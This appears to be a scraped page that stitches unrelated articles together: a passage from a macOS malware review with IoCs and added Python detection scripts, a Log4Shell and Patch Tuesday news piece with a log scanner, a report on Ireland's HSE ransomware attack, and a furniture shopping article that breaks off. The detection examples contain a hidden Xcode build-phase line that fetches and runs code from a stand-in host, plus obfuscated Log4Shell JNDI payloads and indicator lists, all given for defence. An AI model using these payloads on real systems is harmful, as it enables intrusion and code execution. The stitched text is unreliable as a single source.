~/.appdata/grconf.dat

Notable Characteristics:

  • Backdoor
  • Cross-Platform
  • Attempts to hide as a system process (T1564.001)
  • Uses a Launch Agent for persistence (T1543.001)
  • Uses Python for its executable (T1059.006)

7. XLoader

Also first described in July (this time by Check Point) and also cross-platform, XLoader is a Malware-as-a-Service infostealer and keylogger. The Mac version of XLoader is unusual in several regards, but primarily because it is Java-based. Java installs are no longer common on Macs; aside from Minecraft players and researchers running Ghidra, the most likely places to find a Java runtime are Java developers’ machines and certain legacy business and banking applications.

XLoader’s executable is a heavily stripped and obfuscated Mach-O dropped in the user’s Home folder. It also drops a hidden application bundle in the same location containing a copy of itself. It then loads a user LaunchAgent for persistence with the program argument pointing to the hidden app bundle. All file names are randomized and vary from execution to execution. Among other things, XLoader will attempt to steal credentials from Chrome and Firefox browsers.

Detection of XLoader in SentinelOne console

Primary IoCs:

XLoader Mach-O Executable: KIbwf02l
7edead477048b47d2ac3abdc4baef12579c3c348

Suspected Phishing lure attachment: Statement SKBMT 09818.jar
b8c0167341d3639eb1ed2636a56c272dc66546fa

Example Persistence LaunchAgent: com.j85H64iPLnW.rXxHYP
cb3e7ac4e2e83335421f8bbc0cf953cb820e2e27

Notable Characteristics:

  • Infostealer – Input Capture via Keylogger (T1056.001, T1056)
  • Requires a Java runtime (JRE) to be installed on the victim machine
  • Uses Mach-O executables
  • Uses a Launch Agent for persistence (T1543.001)
  • Uses random file names unique for each instance
  • Defense evasion via hidden artifacts (T1564.001)

8. XCSSET Updated

XCSSET malware was initially described by Trend Micro last year, in August 2020. However, the malware has undergone quite a lot of development in that time, and by July 2021 there had certainly been enough changes to warrant revisiting it. Like OSAMiner (See Item 2, above), XCSSET makes heavy use of run-only AppleScripts, and both use the same AppleScript code in their string encryption and decryption routines.

AppleScript string decryption routine used in both XCSSET and OSAMiner malware

At one point, Apple linked OSAMiner and XCSSET together in their XProtect signature file, branding them both part of the same family they called “DubRobber”. That link no longer appears in XProtect, but the code sharing is certainly intriguing. Both malware families appear to be targeting primarily Chinese and Asian macOS users, with some suggestions that XCSSET is aimed at Chinese gambling sites and users.

Despite the similarities noted, XCSSET and OSAMiner share little else in common. XCSSET is vastly more complex and makes use of many different components and TTPs that make it difficult for traditional AV software to detect and easy for the authors to adapt. Among those is the use of shc, a publicly available shell script compiler that makes XCSSET Mach-O binaries opaque to static signature scanning engines like XProtect, meaning the only sure way to catch XCSSET is through behavioral detection.

XCSSET also uses other publicly available projects to replace the user’s browser Dock icon with a fake one that launches the malware whenever the user launches their browser from the Dock. The developers of XCSSET have also used zero-days to bypass privacy protections allowing them to take screen captures by hijacking the entitlements of other apps on the system.

Primary IoCs:

~/Library/Caches/GeoServices/.report
~/Library/Caches/GeoServices/.plist
~/Library/Caches/GeoServices/.domain
~/Library/Caches/GeoServices/AppleKit

Notable Characteristics:

  • Infostealer
  • Uses Run-only AppleScripts (T1059.002)
  • Uses Python executables (T1059.006)
  • Uses SHC shell script compiler to obfuscate shell scripts
  • Uses a Launch Agent for persistence (T1543.001)
  • Attempts to hide as a system process (T1564.001)
  • Replaces Browser Dock Icon
  • Steals user data from Chrome, Contacts, Notes, Opera, Skype and others
  • Injects a payload into the build phase of local Xcode projects
  • Uses a Zero Day
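
XcodeSpy (item 5) and XCSSET both reach developers through the same seam: a Run Script build phase in a local Xcode project that executes whenever the target is built. A practitioner reviewing a cloned or shared project can check the project file directly. The following is an added example written for this post, not code from SentinelOne or from the malware analyses it cites; it pulls every `shellScript` entry out of a `project.pbxproj` and flags bodies that show obfuscation markers. The indicator list (including the whitespace-padding heuristic, which hides a script body below the visible part of Xcode’s build-phase editor) is our own, and the sample project text, hex string and `example.invalid` URL are constructed for the example.

```python
import re
from pathlib import Path

# Our own indicator list for a Run Script build phase body.
SUSPICIOUS = [
    r"\beval\b",
    r"\bbase64\b",
    r"\bxxd\s+-r",
    r"\b(curl|wget)\b",
    r"\bosascript\b",
    r"\bpython[23]?\s+-c\b",
    r"/private/tmp/|/tmp/",
]

# In project.pbxproj a build phase stores its body as:  shellScript = "...";  with \" and \n escapes
SHELL_SCRIPT_RE = re.compile(r'shellScript\s*=\s*"((?:[^"\\]|\\.)*)"\s*;')
ESCAPES = {"n": "\n", "t": "\t", '"': '"', "\\": "\\"}


def unescape_pbx(s):
    return re.sub(r"\\(.)", lambda m: ESCAPES.get(m.group(1), m.group(1)), s)


def extract_run_scripts(pbxproj_text):
    """Every Run Script body in the project, in file order."""
    return [unescape_pbx(m.group(1)) for m in SHELL_SCRIPT_RE.finditer(pbxproj_text)]


def assess_script(script):
    """Return the indicators a script body trips; empty list means nothing odd."""
    reasons = []
    # A long run of leading blanks makes the body look empty in Xcode's build-phase editor
    if len(script) - len(script.lstrip(" \t")) > 40:
        reasons.append("whitespace-padded")
    for pat in SUSPICIOUS:
        if re.search(pat, script):
            reasons.append(pat)
    return reasons


def scan_pbxproj_text(text):
    """(index, reasons) for each Run Script phase worth reading by hand."""
    hits = []
    for i, script in enumerate(extract_run_scripts(text)):
        reasons = assess_script(script)
        if reasons:
            hits.append((i, reasons))
    return hits


def scan_project(xcodeproj_dir):
    """Scan a real Foo.xcodeproj directory on disk."""
    text = Path(xcodeproj_dir, "project.pbxproj").read_text(errors="replace")
    return scan_pbxproj_text(text)


# Constructed sample project fragment: one stock placeholder phase, one padded, obfuscated phase.
SAMPLE_PBXPROJ = (
    "/* Begin PBXShellScriptBuildPhase section */\n"
    "AB12 /* ShellScript */ = {\n"
    "    isa = PBXShellScriptBuildPhase;\n"
    "    shellPath = /bin/sh;\n"
    '    shellScript = "# Type a script or drag a script file from your workspace.\\n";\n'
    "};\n"
    "CD34 /* ShellScript */ = {\n"
    "    isa = PBXShellScriptBuildPhase;\n"
    "    shellPath = /bin/sh;\n"
    '    shellScript = "' + " " * 60
    + 'eval \\"$(echo 6375726c | xxd -r -p)\\" http://example.invalid/x | sh\\n";\n'
    "};\n"
    "/* End PBXShellScriptBuildPhase section */\n"
)

if __name__ == "__main__":
    for index, reasons in scan_pbxproj_text(SAMPLE_PBXPROJ):
        print("Run Script phase", index, "->", reasons)
```

The hex string in the sample decodes to `curl`, which is exactly why the scanner looks for the decoder (`xxd -r`, `base64`, `eval`) rather than for the command name; a scanner that only greps for `curl` misses the case the example is built to show.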

9. OSX.Zuru

In September, macOS malware researcher @codecolorist noticed that sponsored links in the Baidu search engine were spreading malware via trojanized versions of iTerm2. A rapid triage by Patrick Wardle dubbed the malware “OSX.Zuru”. Subsequent investigation revealed that Microsoft’s Remote Desktop for Mac was also being trojanized with the same malware, as were SecureCRT and Navicat.

The selection of trojanized apps is interesting and suggests the threat actor was targeting users of backend tools used for SSH and other remote connections and business database management.

However, given that the only known distribution method to date relies on sponsored web searches, indications are that this is a “shotgun” approach in the hope of hoovering up interesting targets rather than a specifically-targeted campaign.

The threat actor had modified the original application bundles with a malicious dylib in the .app/Contents/Frameworks/ folder called libcrypto.2.dylib. This downloads two further components: a Python script dropped at /tmp/g.py and a heavily-obfuscated Mach-O dropped at /private/tmp/GoogleUpdate.

Analysis of this file reveals functionality for surveilling the local environment, reaching out to a C2 server and executing remote commands via a backdoor.

Primary IoCs:

/Applications/iTerm.app/Contents/Frameworks/libcrypto.2.dylib
/Applications/Microsoft Remote Desktop.app/Contents/Frameworks/libcrypto.2.dylib
/private/tmp/GoogleUpdate
/tmp/g.py

Notable Characteristics:

  • Backdoor
  • Uses a Mach-O executable
  • Uses Python (T1059.006)
  • Attempts to disguise itself as GoogleUpdate

10. macOS.Macma

In November, Google’s TAG published details of a threat they labelled macOS.Macma. Macma appears to be APT activity targeting, among others, Mac users visiting Hong Kong websites supporting pro-democracy activism. Both a zero day and an N-day (a known vulnerability with an available patch) were used at various points in the campaign: a remote code execution (RCE) N-day in WebKit, already patched by Apple at the time, and a local privilege escalation (LPE) zero-day in the XNU kernel.

The malware, which appears to date from at least 2019, is delivered in two distinct ways: via a trojanized app containing several malicious binaries and a shell script in its Resources folder, and via a watering-hole attack on visitors to certain websites.

It primarily functions as a keylogger, screen capturer, and backdoor.

macOS.Macma execution chain as seen in the SentinelOne console

Primary IoCs:

~/Library/LaunchAgents/com.UserAgent.va.plist
~/Library/Preferences/UserAgent/lib/UserAgent
~/Library/Preferences/Tools/arch
~/Library/Preferences/Tools/kAgent
~/Library/Preferences/Tools/at

Notable Characteristics:

  • Infostealer – Input Capture via Keylogger (T1056.001, T1056)
  • Uses a Zero Day
  • Uses a patched vulnerability, targeting users that failed to patch
  • Uses Mach-O executables
  • Uses a Launch Agent for persistence (T1543.001)

What Can We Learn From This Year’s macOS Malware?

It’s been said that the past is no reliable guide to the future (thanks, David Hume!), and that goes double when we are talking about malware trends, but there are certainly some interesting developments this year that we haven’t seen quite so pronounced in the past.

In the malware we’ve seen this year, we note first of all an increasing trend towards cross-platform development. This is something we have observed in the commodity adware market, too. Adload, for example, has been experimenting not only with malware written in Google’s Go language, but also in Kotlin.

Secondly, we note that a significant number of campaigns targeting macOS users either originated from or were targeted towards (or both) Chinese and Asian macOS users. This no doubt reflects a number of factors: the increasing importance of the macOS operating system in Asian markets, and an increasing familiarity with macOS development skills among macOS malware authors either from, or interested in, spying on that part of the world. Note that XCSSET, OSX.Zuru and macOS.Macma in particular show a high-level of familiarity with the macOS platform. However, XcodeSpy was discovered in a large, well-known U.S. organization, so it’s certainly not the case that all the recent macOS malware traffic is heading east.

We’ve also seen a number of attacks targeting software developers: XcodeSpy, XCSSET and XLoader all target environments that you might typically find on an enterprise developer’s Mac.

At least three of this year’s ten new malware families were also likely highly-targeted, possibly APT, attacks: XcodeSpy, WildPressure, and macOS.Macma all had very particular targets in mind and do not appear to be primarily financially motivated.

Similarly, the number of malware families whose primary function is espionage – backdoors, RATs, and keyloggers – is notable: 6 out of 10 of this year’s new macOS malware were aimed at spying on or taking over the computers of targets. Of the other four, two were loader platforms and two were related to cryptocurrency: either stealing it or mining it.

While threat actors expand their range of TTPs and seek to leverage known and undiscovered vulnerabilities, it is worth noting that by far the majority continue to rely on abusing LaunchAgents for persistence. This offers plenty of opportunities for detection and protection. At the same time, security teams are advised to prepare for the possibility that threat actors will soon start to explore less obvious ways to persist.
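
Because nearly every family above (OSAMiner, Silver Sparrow, XcodeSpy, WildPressure, XLoader, XCSSET, Macma) lands in ~/Library/LaunchAgents, a periodic audit of that folder is one of the cheapest detections available. The following is an added example written for this post, not SentinelOne code; it scores each user LaunchAgent against patterns drawn from this year’s IoCs: a com.apple.* label in a user folder (Apple installs its own agents under /System/Library/LaunchAgents), a program path hidden in a dot-file or under /tmp, and an interpreter such as python or osascript as the program. The indicator list is our own, and the two sample plists, the user name jdoe and the vendor path are constructed for the example.

```python
import plistlib
import re
from pathlib import Path

INTERPRETERS = re.compile(r"(^|/)(python[23]?|osascript|sh|bash|zsh|perl)$")


def assess_agent(filename, plist):
    """Reasons a user LaunchAgent deserves a look; empty list means nothing odd."""
    reasons = []
    label = str(plist.get("Label", ""))
    # Apple ships its agents in /System/Library/LaunchAgents, never ~/Library/LaunchAgents;
    # OSAMiner, XcodeSpy and WildPressure all used com.apple.* names there to blend in
    if label.startswith("com.apple.") or filename.startswith("com.apple."):
        reasons.append("apple-lookalike-label")
    args = [str(a) for a in plist.get("ProgramArguments", [])]
    if "Program" in plist:
        args.insert(0, str(plist["Program"]))
    for a in args:
        # ElectroRAT (~/.mdworker), WildPressure (~/.appdata) and XLoader hid payloads in dot-files
        if any(p.startswith(".") and p not in (".", "..") for p in a.split("/")):
            reasons.append("hidden-path:" + a)
        if a.startswith(("/tmp/", "/private/tmp/")):
            reasons.append("tmp-path:" + a)
    # WildPressure ran a Python script straight from ProgramArguments
    if args and INTERPRETERS.search(args[0]):
        reasons.append("interpreter:" + args[0])
    return reasons


def scan_launch_agents(directory=None):
    """Scan a LaunchAgents folder on a live Mac (defaults to the current user's)."""
    directory = Path(directory or Path.home() / "Library" / "LaunchAgents")
    results = {}
    for p in sorted(directory.glob("*.plist")):
        try:
            plist = plistlib.loads(p.read_bytes())
        except Exception as exc:  # a plist launchd cannot load is itself worth a look
            results[p.name] = ["unparseable:" + exc.__class__.__name__]
            continue
        reasons = assess_agent(p.name, plist)
        if reasons:
            results[p.name] = reasons
    return results


# Constructed samples (labels and paths are illustrative, modelled on the IoCs above)
SAMPLES = {
    "com.apple.pyapple.plist": b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.apple.pyapple</string>
  <key>ProgramArguments</key><array>
    <string>/usr/bin/python</string>
    <string>/Users/jdoe/.appdata/grconf.dat</string>
  </array>
  <key>RunAtLoad</key><true/>
</dict></plist>""",
    "com.vendor.updater.plist": b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.vendor.updater</string>
  <key>ProgramArguments</key><array>
    <string>/Applications/Vendor.app/Contents/MacOS/updater</string>
    <string>--check</string>
  </array>
  <key>StartInterval</key><integer>3600</integer>
</dict></plist>""",
}


def scan_samples():
    results = {}
    for name, data in SAMPLES.items():
        reasons = assess_agent(name, plistlib.loads(data))
        if reasons:
            results[name] = reasons
    return results


if __name__ == "__main__":
    for name, reasons in scan_samples().items():
        print(name, reasons)
```

On a fleet, run `scan_launch_agents()` per user and diff the results against a baseline taken at enrollment; a new com.apple.* agent appearing in a user folder is a far stronger signal than any single hash-based IoC, because, as the lists above show, the file names change from family to family while the technique does not.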

Conclusion

For enterprises running macOS fleets, the message from this year’s malware discoveries is clear: threat actors are becoming increasingly interested in the macOS platform, are more familiar with how to exploit it, and are interested in high-value targets.

It is imperative for all security teams to prepare to defend against increasing numbers of increasingly sophisticated attacks on the Mac platform. SentinelOne and SentinelLabs have published several ebooks to help Mac admins, IT teams and security administrators further understand the risks and fortify their defenses; these include A Guide to macOS Threat Hunting and Incident Response and The Complete Guide to Understanding Apple Mac Security for Enterprise. Analysts may also wish to consult our How To Reverse Malware on macOS ebook as well as the SentinelLabs’ series of posts on reversing macOS malware with radare2.

The Complete Guide to Understanding Apple Mac Security for Enterprise
Learn how to secure macOS devices in the enterprise with this in-depth review of the strengths and weaknesses of Apple’s security technologies.

If you would like to learn more about how SentinelOne can help protect your Mac fleet, contact us for more information or request a free demo.

Microsoft Patch Tuesday, December 2021 Edition

Microsoft, Adobe, and Google all issued security updates to their products today. The Microsoft patches include six previously disclosed security flaws, and one that is already being actively exploited. But this month’s Patch Tuesday is overshadowed by the “Log4Shell” 0-day exploit in a popular Java library that web server administrators are now racing to find and patch amid widespread exploitation of the flaw.

Log4Shell is the name picked for a critical flaw disclosed Dec. 9 in the popular logging library for Java called “log4j,” which is included in a huge number of Java applications. Publicly released exploit code allows an attacker to force a server running a vulnerable log4j library to execute commands, such as downloading malicious software or opening a backdoor connection to the server.

According to researchers at Lunasec, many, many services are vulnerable to this exploit.

“Cloud services like Steam, Apple iCloud, and apps like Minecraft have already been found to be vulnerable,” Lunasec wrote. “Anybody using Apache Struts is likely vulnerable. We’ve seen similar vulnerabilities exploited before in breaches like the 2017 Equifax data breach. An extensive list of responses from impacted organizations has been compiled here.”

“If you run a server built on open-source software, there’s a good chance you are impacted by this vulnerability,” said Dustin Childs of Trend Micro’s Zero Day Initiative. “Check with all the vendors in your enterprise to see if they are impacted and what patches are available.”

Part of the difficulty in patching against the Log4Shell attack is identifying all of the vulnerable web applications, said Johannes Ullrich, an incident handler and blogger for the SANS Internet Storm Center. “Log4Shell will continue to haunt us for years to come. Dealing with log4shell will be a marathon,” Ullrich said. “Treat it as such.” SANS has a good walk-through of how simple yet powerful the exploit can be.
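
Finding the vulnerable applications is one half of the problem Ullrich describes; the other is finding who is already probing them, and a naive search of web logs for the literal string `${jndi:` misses the obfuscated variants that were in circulation within hours of disclosure. The following is an added example written for this post, not code from SANS or from any of the researchers quoted; it percent-decodes each log line and collapses log4j’s `${lower:…}`, `${upper:…}` and `${…:-default}` lookups from the inside out until the JNDI lookup, if any, is exposed. The sample access-log lines are constructed for the example and use a documentation address (198.51.100.7) as the attacker host.

```python
import re
from urllib.parse import unquote

LOOKUP = re.compile(r"\$\{([^${}]*)\}")  # innermost ${...} with no further lookup inside
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.I)


def _resolve(body):
    """Collapse one innermost lookup to the text it evaluates to, or None if it is a real
    lookup (jndi:, date:, ...) that must be left alone."""
    kind, _, arg = body.partition(":")
    kind = kind.strip().lower()
    if kind == "jndi":
        return None
    if ":-" in body:  # default-value form: ${env:NOPE:-j} and ${::-j} both yield "j"
        return body.split(":-", 1)[1]
    if kind == "lower":
        return arg.lower()
    if kind == "upper":
        return arg.upper()
    return None


def normalize(text, max_rounds=16):
    """Undo percent-encoding, then peel nested lookups from the inside out."""
    for _ in range(2):  # handle single and double URL-encoding
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(max_rounds):
        changed = False

        def repl(m):
            nonlocal changed
            r = _resolve(m.group(1))
            if r is None:
                return m.group(0)
            changed = True
            return r

        text = LOOKUP.sub(repl, text)
        if not changed:
            break
    return text


def scan_log_lines(lines):
    """Return (1-based line number, normalized line) for every line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        norm = normalize(line)
        if JNDI.search(norm):
            hits.append((n, norm))
    return hits


# Constructed sample: plain, obfuscated and percent-encoded probes plus two benign lines.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:21:12:03 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:21:12:07 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:21:12:09 +0000] "GET / HTTP/1.1" 200 612 "-" "${${lower:j}${upper:n}di:${::-l}dap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:21:12:11 +0000] "GET /?x=%24%7B%24%7Benv%3AFOO%3A-j%7Dndi%3Aldap%3A%2F%2F198.51.100.7%3A1389%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.64"',
    '10.0.0.12 - - [10/Dec/2021:21:12:15 +0000] "GET /docs/${version} HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, norm in scan_log_lines(SAMPLE_LOG):
        print(n, norm)
```

Note that the scanner reports what the lookup resolves to rather than the raw bytes, which is what you want when pivoting from a web log to the LDAP host the probe pointed at; lines 2, 3 and 4 of the sample all normalize to the same `${jndi:ldap://198.51.100.7:1389/a}`. Feeding the attacker-controlled User-Agent through the same `${...}` resolver is the thing to avoid in your own code, which is why this example only ever rewrites a copy of the log line.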

John Hultquist, vice president of intelligence analysis at Mandiant, said the company has seen Chinese and Iranian state actors leveraging the log4j vulnerability, and that the Iranian actors are particularly aggressive, having taken part in ransomware operations that may be primarily carried out for disruptive purposes rather than financial gain.

“We anticipate other state actors are doing so as well, or preparing to,” Hultquist said. “We believe these actors will work quickly to create footholds in desirable networks for follow-on activity, which may last for some time. In some cases, they will work from a wish list of targets that existed long before this vulnerability was public knowledge. In other cases, desirable targets may be selected after broad targeting.”

Researcher Kevin Beaumont had a more lighthearted take on Log4Shell via Twitter:

“Basically the perfect ending to cybersecurity in 2021 is a 90s style Java vulnerability in an open source module, written by two volunteers with no funding, used by large cybersecurity vendors, undetected until Minecraft chat got pwned, where nobody knows how to respond properly.”

A half-dozen of the vulnerabilities addressed by Microsoft today earned its most dire “critical” rating, meaning malware or miscreants could exploit the flaws to gain complete, remote control over a vulnerable Windows system with little or no help from users.

The Windows flaw already seeing active exploitation is CVE-2021-43890, which is a “spoofing” bug in the Windows AppX installer on Windows 10. Microsoft says it is aware of attempts to exploit this flaw using specially crafted packages to implant malware families like Emotet, Trickbot, and BazaLoader.

Kevin Breen, director of threat research for Immersive Labs, said CVE-2021-43905 stands out of this month’s patch batch.

“Not only for its high CVSS score of 9.6, but also because it’s noted as ‘exploitation more likely’,” Breen observed.

Microsoft also patched CVE-2021-43883, an elevation of privilege vulnerability in Windows Installer.

“This appears to be a fix for a patch bypass of CVE-2021-41379, another elevation of privilege vulnerability in Windows Installer that was reportedly fixed in November,” Satnam Narang of Tenable points out. “However, researchers discovered that fix was incomplete, and a proof-of-concept was made public late last month.”

Google issued five security fixes for Chrome, including one rated critical and three others with high severity. If you’re browsing with Chrome, keep a lookout for when you see an “Update” tab appear to the right of the address bar. If it’s been a while since you closed the browser, you might see the Update button turn from green to orange and then red. Green means an update has been available for two days; orange means four days have elapsed, and red means your browser is a week or more behind on important updates. Completely close and restart the browser to install any pending updates.

Also, Adobe issued patches to correct more than 60 security flaws in a slew of products, including Adobe Audition, Lightroom, Media Encoder, Premiere Pro, Prelude, Dimension, After Effects, Photoshop, Connect, Experience Manager and Premiere Rush.

Standard disclaimer: Before you update Windows, please make sure you have backed up your system and/or important files. It’s not uncommon for a Windows update package to hose one’s system or prevent it from booting properly, and some updates have been known to erase or corrupt files.

So do yourself a favor and backup before installing any patches. Windows 10 even has some built-in tools to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once.

And if you wish to ensure Windows has been set to pause updating so you can back up your files and/or system before the operating system decides to reboot and install patches on its own schedule, see this guide.

If you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there’s a decent chance other readers have experienced the same and may chime in here with useful tips.

Additional reading:

SANS ISC listing of each Microsoft vulnerability patched today, indexed by severity and affected component.

Inside Ireland’s Public Healthcare Ransomware Scare

The consulting firm PricewaterhouseCoopers recently published lessons learned from the disruptive and costly ransomware attack in May 2021 on Ireland’s public health system. The unusually candid post-mortem found that nearly two months elapsed between the initial intrusion and the launching of the ransomware. It also found affected hospitals had tens of thousands of outdated Windows 7 systems, and that the health system’s IT administrators failed to respond to multiple warning signs that a massive attack was imminent.

PWC’s timeline of the days leading up to the deployment of Conti ransomware on May 14.

Ireland’s Health Service Executive (HSE), which operates the country’s public health system, got hit with Conti ransomware on May 14, 2021. A timeline in the report (above) says the initial infection of the “patient zero” workstation happened on Mar. 18, 2021, when an employee on a Windows computer opened a booby-trapped Microsoft Excel document in a phishing email that had been sent two days earlier.

Less than a week later, the attacker had established a reliable backdoor connection to the employee’s infected workstation. After infecting the system, “the attacker continued to operate in the environment over an eight week period until the detonation of the Conti ransomware on May 14, 2021,” the report states.

According to PWC’s report (PDF), there were multiple warning signs about a serious network intrusion, but those red flags were either misidentified or not acted on quickly enough:

  • On Mar. 31, 2021, the HSE’s antivirus software detected the execution of two software tools commonly used by ransomware groups — Cobalt Strike and Mimikatz — on the Patient Zero Workstation. But the antivirus software was set to monitor mode, so it did not block the malicious commands.
  • On May 7, the attacker compromised the HSE’s servers for the first time, and over the next five days the intruder would compromise six HSE hospitals. On May 10, one of the hospitals detected malicious activity on its Microsoft Windows Domain Controller, a critical “keys to the kingdom” component of any Windows enterprise network that manages user authentication and network access.
  • On 10 May 2021, security auditors first identified evidence of the attacker compromising systems within Hospital C and Hospital L. Hospital C’s antivirus software detected Cobalt Strike on two systems but failed to quarantine the malicious files.
  • On May 13, the HSE’s antivirus security provider emailed the HSE’s security operations team, highlighting unhandled threat events dating back to May 7 on at least 16 systems. The HSE Security Operations team requested that the Server team restart servers.

By then it was too late. At just after midnight Ireland time on May 14, the attacker executed the Conti ransomware within the HSE. The attack disrupted services at several Irish hospitals and resulted in the near complete shutdown of the HSE’s national and local networks, forcing the cancellation of many outpatient clinics and healthcare services. The number of appointments in some areas dropped by up to 80 percent.

Conti initially demanded USD $20 million worth of virtual currency in exchange for a digital key to unlock HSE servers compromised by the group. But perhaps in response to the public outcry over the HSE disruption, Conti reversed course and gave the HSE the decryption keys without requiring payment.

Still, the work to restore infected systems would take months. The HSE ultimately enlisted members of the Irish military to bring in laptops and PCs to help restore computer systems by hand. It wasn’t until September 21, 2021 that the HSE declared 100 percent of its servers were decrypted.

As bad as the HSE ransomware attack was, the PWC report emphasizes that it could have been far worse. For example, it is unclear how much data would have been unrecoverable if a decryption key had not become available as the HSE’s backup infrastructure was only periodically backed up to offline tape.

The attack also could have been worse, the report found:

  • if there had been intent by the Attacker to target specific devices within the HSE environment (e.g. medical devices);
  • if the ransomware took actions to destroy data at scale;
  • if the ransomware had auto-propagation and persistence capabilities, for example by using an exploit to propagate across domains and trust-boundaries to medical devices (e.g. the EternalBlue exploit used by the WannaCry and NotPetya attacks);
  • if cloud systems had also been encrypted such as the COVID-19 vaccination system

The PWC report contains numerous recommendations, most of which center around hiring new personnel to lead the organization’s redoubled security efforts. But it is clear that the HSE has an enormous amount of work ahead to grow in security maturity. For example, the report notes the HSE’s hospital network had over 30,000 Windows 7 workstations that were deemed end of life by the vendor.

“The HSE assessed its cybersecurity maturity rating as low,” PWC wrote. “For example, they do not have a CISO or a Security Operations Center established.”

PWC also estimates that efforts to build up the HSE’s cybersecurity program to the point where it can rapidly detect and respond to intrusions are likely to cost “a multiple of the HSE’s current capital and operation expenditure in these areas over several years.”

One idea of a “security maturity” model.

In June 2021, the HSE’s director general said the recovery costs for the May ransomware attack were likely to exceed USD $600 million.

What’s remarkable about this incident is that the HSE is publicly funded by the Irish government, and so in theory it has the money to spend (or raise) to pay for all these ambitious recommendations for increasing their security maturity.

That stands in stark contrast to the healthcare system here in the United States, where the single biggest impediment to doing security well continues to be lack of making it a real budget priority. Also, most healthcare organizations in the United States are private companies that operate on razor-thin profit margins.

I know this because in 2018 I was asked to give the keynote at an annual gathering of the Healthcare Information Sharing and Analysis Group (H-ISAC), an industry group centered on sharing information about cybersecurity threats. I almost didn’t accept the invitation: I’d written very little about healthcare security, which seemed to be dominated by coverage of whether healthcare organizations complied with the letter of the law in the United States. That compliance centered on the Health Insurance Portability and Accountability Act (HIPAA), which prioritizes protecting the integrity and privacy of patient data.

To get up to speed, I interviewed over a dozen of the healthcare security industry’s best and brightest minds. A common refrain I heard from those interviewed was that if it was security-related but didn’t have to do with compliance, there probably wasn’t much chance it would get any budget.

Those sources unanimously said that however well-intentioned, it’s not clear that the “protect the data” regulatory approach of HIPAA was working from an overall threat perspective. According to HealthcareIT News, more than 40 million patient records have been compromised in incidents reported to the federal government in 2021 so far alone.

During my 2018 talk, I tried to emphasize the primary importance of being able to respond quickly to intrusions. Here’s a snippet of what I told that H-ISAC audience:

“The term ‘Security Maturity’ refers to the street smarts of an individual or organization, and this maturity generally comes from making plenty of mistakes, getting hacked a lot, and hopefully learning from each incident, measuring response times, and improving.

Let me say up front that all organizations get hacked. Even ones that are doing everything right from a security perspective get hacked probably every day if they’re big enough. By hacked I mean someone within the organization falls for a phishing scam, or clicks a malicious link and downloads malware. Because let’s face it, it only takes one screw up for the hackers to get a foothold in the network.

Now this in itself isn’t bad. Unless you don’t have the capability to detect it and respond quickly. And if you can’t do that, you run the serious risk of having a small incident metastasize into a much larger problem.

Think of it like the medical concept of the ‘Golden Hour:’ That short window of time directly following a traumatic injury like a stroke or heart attack in which life-saving medicine and attention is likely to be most effective. The same concept holds true in cybersecurity, and it’s exactly why so many organizations these days are placing more of their resources into incident response, instead of just prevention.”

The United States’ somewhat decentralized healthcare system means that many ransomware outbreaks tend to be limited to regional or local healthcare facilities. But a well-placed ransomware attack or series of attacks could inflict serious damage on the sector: A December 2020 report from Deloitte says the top 10 health systems now control 24% of the market, and their revenue grew at twice the rate of the rest of the market.

In October 2020, KrebsOnSecurity broke the story that the FBI and U.S. Department of Homeland Security had obtained chatter from a top ransomware group which warned of an “imminent cybercrime threat to U.S. hospitals and healthcare providers.” Members associated with the Russian-speaking ransomware group known as Ryuk had discussed plans to deploy ransomware at more than 400 healthcare facilities in the United States.

Hours after that piece ran, I heard from a respected H-ISAC security professional who questioned whether it was worth getting the public so riled up. The story had been updated multiple times throughout the day, and there were at least five healthcare organizations hit with ransomware within the span of 24 hours.

“I guess it would help if I understood what the baseline is, like how many healthcare organizations get hit with ransomware on average in one week?” I asked the source.

“It’s more like one a day,” the source confided.

In all likelihood, the HSE will get the money it needs to implement the programs recommended by PWC, however long that takes. I wonder how many U.S.-based healthcare organizations could say the same.

Mid-Century Modern Furniture For Kids’ Room

Mid-century modern (MCM) style has always fascinated people worldwide. This is probably because of its unique functionality, combined with simple shapes and neat design details. As for kids’ rooms, there are plenty of options to decorate them in this unique style. All you need is to choose the right furniture pieces.

There are plenty of great mid-century modern options on the market, but we suggest going for pieces that are both stylish and functional. We have picked out some of our favorite pieces to help you create a stylish and comfortable kids’ room.

The best kids’ mid-century furniture

There are many fantastic mid-century modern kids’ furniture pieces available on the market. We have compiled a list of the best to help you get started.

Kids’ mid century chair

One of our favorite pieces of furniture for kids’ rooms is the mid-century modern chair. These chairs for kids come in various shapes and sizes, but they all have one common feature – simplicity. This makes them perfect for any type of room, and they will easily complement the overall design.

IKARE Wooden Natural Baby High Chair

If you are looking for a stylish and functional high chair, we suggest going for the IKARE Wooden Natural Baby High Chair. This chair is perfect for kids aged 6 months and up, and it features a beautiful mid-century modern design. It is made of natural wood, which makes it both sturdy and stylish, and it will easily blend in with any room decor.

This mid-century modern high chair is designed to pull right up to your dining table so that your infant can eat, play with toys, learn, and grow alongside you. Because the footplate is height-adjustable and the food tray can be removed, you can adjust the high chair as your child grows. It combines three must-have baby seats in one: a full-size high chair, a booster seat, and a toddler chair.

The IKARE Wooden Natural Baby High Chair is constructed of durable, shock-absorbent beech hardwood. It has a polypropylene (PP) seat designed for comfort and fatigue resistance, and the solid construction improves comfort, balance, and ergonomics. Your baby’s safety is most important, after all! The chair includes a 5-point safety harness with shoulder pads and a crotch strap to offer the safest seating for your child.

KidKraft Mid-Century Kid Upholstered Reading Chair & Ottoman with Storage

